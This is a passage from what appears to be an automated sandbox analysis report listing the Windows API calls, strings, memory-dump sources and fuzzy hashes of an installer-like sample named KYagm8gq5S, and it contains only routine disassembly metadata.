                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F
                                  • API String ID: 941294808-1304234792
                                  • Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                  • Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
                                  • Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                  • Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(Del,00000400), ref: 004066B3
                                  • GetWindowsDirectoryW.KERNEL32(Del,00000400,00000000,007A0728,?,?,00000000,00000000,00798B00,74DF23A0), ref: 004066C9
                                  • SHGetPathFromIDListW.SHELL32(00000000,Del), ref: 00406727
                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406730
                                  • lstrcatW.KERNEL32(Del,\Microsoft\Internet Explorer\Quick Launch,00000000,007A0728,?,?,00000000,00000000,00798B00,74DF23A0), ref: 0040675B
                                  • lstrlenW.KERNEL32(Del,00000000,007A0728,?,?,00000000,00000000,00798B00,74DF23A0), ref: 004067B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                  • String ID: Del$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 4024019347-2121604768
                                  • Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                  • Instruction ID: 996034b20cbe1ccfc182dbfd15fdcef075a6e82f48079f00531b92f4adf5a68d
                                  • Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
                                  • Instruction Fuzzy Hash: D56135716046119BD720AF24DD84B7B77E4AB85318F25063FF687B32D0DA3C8961865E
                                  APIs
                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404557
                                  • GetSysColor.USER32(00000000), ref: 00404595
                                  • SetTextColor.GDI32(?,00000000), ref: 004045A1
                                  • SetBkMode.GDI32(?,?), ref: 004045AD
                                  • GetSysColor.USER32(?), ref: 004045C0
                                  • SetBkColor.GDI32(?,?), ref: 004045D0
                                  • DeleteObject.GDI32(?), ref: 004045EA
                                  • CreateBrushIndirect.GDI32(?), ref: 004045F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                  • Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
                                  • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                  • Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54
                                  APIs
                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                    • Part of subcall function 00406125: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026F6,00000000,00000000,?,00000000,00000011), ref: 0040613B
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                  • String ID: 9
                                  • API String ID: 163830602-2366072709
                                  • Opcode ID: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
                                  • Instruction ID: 94532b36e9b1b55a0417b46d3f551769048a354c57792839695d4204f468be83
                                  • Opcode Fuzzy Hash: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
                                  • Instruction Fuzzy Hash: D6510C75D04119AADF20EFD4CA84AAEBBB9FF44304F14817BE541B62D0D7B89D82CB58
                                  APIs
                                  • lstrlenW.KERNEL32(007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                  • lstrlenW.KERNEL32(0040341A,007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                  • lstrcatW.KERNEL32(007A0728,0040341A,0040341A,007A0728,00000000,00798B00,74DF23A0), ref: 00405634
                                  • SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2531174081-0
                                  • Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                  • Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
                                  • Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
                                  • Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8
                                  APIs
                                  • CharNextW.USER32(?,*?|<>/":,00000000,007B3000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
                                  • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406874
                                  • CharNextW.USER32(?,007B3000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
                                  • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 589700163-4010320282
                                  • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                  • Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
                                  • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                  • Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD
                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EA9
                                  • GetMessagePos.USER32 ref: 00404EB1
                                  • ScreenToClient.USER32(?,?), ref: 00404ECB
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EDD
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                  • Instruction ID: 20ba1dd8c6eb147b8de8e184d932bb38cbf2a2b27d4ef3642ae6e6b093867634
                                  • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                  • Instruction Fuzzy Hash: D6015E72900219BADB00DB95DD85FFEBBBCAF95711F10412BBB51B61D0C7B49A018BA4
                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                  • MulDiv.KERNEL32(0028AF26,00000064,0028AF2A), ref: 00403001
                                  • wsprintfW.USER32 ref: 00403011
                                  • SetWindowTextW.USER32(?,?), ref: 00403021
                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                  Strings
                                  • verifying installer: %d%%, xrefs: 0040300B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                  • Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
                                  • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                  • Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                  • GlobalFree.KERNEL32(?), ref: 00402A2B
                                  • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID:
                                  • API String ID: 2667972263-0
                                  • Opcode ID: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                  • Instruction ID: 5c013e3641f51b8511de27967d5ac64a9b846b719b0e1cdf51d049a21d65d460
                                  • Opcode Fuzzy Hash: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                  • Instruction Fuzzy Hash: 3D31B171D00128BBCF21AFA5CE4999E7E79AF45324F10423AF511762E1CB794D419F98
                                  APIs
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CloseEnum$DeleteValue
                                  • String ID:
                                  • API String ID: 1354259210-0
                                  • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                  • Instruction ID: 9b286c5d8e76f57eb0c9cc6cf8757f48d710680964e76fdf16ae971aa0981de0
                                  • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                  • Instruction Fuzzy Hash: 64215A7150010ABFDF129F90CE89EEF7A7DEB14398F110076B909B21A0D7B48E54AA64
                                  APIs
                                  • GetDlgItem.USER32(?,?), ref: 00401DBF
                                  • GetClientRect.USER32(?,?), ref: 00401E0A
                                  • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                  • DeleteObject.GDI32(00000000), ref: 00401E5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
                                  • Instruction ID: bf706e621430f2b8e1e8296bf8ea73d697ba0e02d4cfc8f60e3200fcd9798b2c
                                  • Opcode Fuzzy Hash: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
                                  • Instruction Fuzzy Hash: 57212A72904119AFCB05DF94DE45AEEBBB5EB08300F14403AF945F62A0DB389D81DB98
                                  APIs
                                  • GetDC.USER32(?), ref: 00401E76
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                  • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                  • String ID:
                                  • API String ID: 3808545654-0
                                  • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                  • Instruction ID: 03fa82d4c3f414405e360d431a269216209ac9bc2718b2d324fdabe448a9bb24
                                  • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                  • Instruction Fuzzy Hash: 28018471954250EFEB015BB4AE89BDD3FB4AF59301F10497AF142BA1E2CAB90444DB3D
                                  APIs
                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
                                  • Instruction ID: 31ba3c168d84f0c85bcad1357d39928db2ba622a9cc012c1a012c7db44d830b4
                                  • Opcode Fuzzy Hash: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
                                  • Instruction Fuzzy Hash: 66218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                  APIs
                                  • lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E21
                                  • wsprintfW.USER32 ref: 00404E2A
                                  • SetDlgItemTextW.USER32(?,007A1748), ref: 00404E3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
